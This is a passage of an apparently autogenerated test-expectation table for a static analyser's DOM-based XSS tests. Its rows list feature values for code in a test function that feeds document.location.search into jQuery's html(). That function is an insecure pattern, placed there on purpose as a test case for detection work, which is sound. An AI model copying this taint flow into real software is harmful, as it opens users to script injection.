element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:32 | ansiToH ... nvert() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:32 | ansiToH ... nvert() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:32 | ansiToHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:32 | ansiToHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:7:450:32 | ansiToHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:450:20:450:32 | exceptional return of new Convert() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:450:20:450:32 | exceptional return of new Convert() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:20:450:32 | exceptional return of new Convert() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:450:20:450:32 | new Convert() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:450:20:450:32 | new Convert() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:20:450:32 | new Convert() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:450:24:450:30 | Convert | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:450:24:450:30 | Convert | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:450:24:450:30 | Convert | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | ansiToHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | ansiToHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | ansiToHtml | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | ansiToHtml | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | ansiToHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | this | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | this | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:452:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | 'arguments' object of function ansiToHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | 'arguments' object of function ansiToHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | 'arguments' object of function ansiToHTML | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | 'arguments' object of function ansiToHTML | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | 'arguments' object of function ansiToHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | exceptional return of function ansiToHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | exceptional return of function ansiToHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | exceptional return of function ansiToHTML | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | exceptional return of function ansiToHTML | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | exceptional return of function ansiToHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | return of function ansiToHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | return of function ansiToHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | return of function ansiToHTML | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | return of function ansiToHTML | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:452:1:457:1 | return of function ansiToHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:452:10:452:19 | ansiToHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:452:10:452:19 | ansiToHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:452:10:452:19 | ansiToHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:12 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:12 | source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:12 | source | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:12 | source | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:12 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source ... .search | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source ... .search | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:7:453:39 | source ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:23 | document | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:23 | document | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:32 | document.location | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:32 | document.location | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:39 | documen ... .search | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:39 | documen ... .search | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:16:453:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:25:453:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:25:453:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:25:453:32 | location | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:25:453:32 | location | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:25:453:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:453:34:453:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:453:34:453:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:453:34:453:39 | search | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:453:34:453:39 | search | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:453:34:453:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:3 | $ | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:3 | $ | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | $("#foo") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | $("#foo") | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | $("#foo") | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | exceptional return of $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | exceptional return of $("#foo") | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | exceptional return of $("#foo") | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:11 | exceptional return of $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:16 | $("#foo").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:16 | $("#foo").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:16 | $("#foo").html | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:16 | $("#foo").html | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:16 | $("#foo").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | $("#foo ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | $("#foo ... source) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | $("#foo ... source) 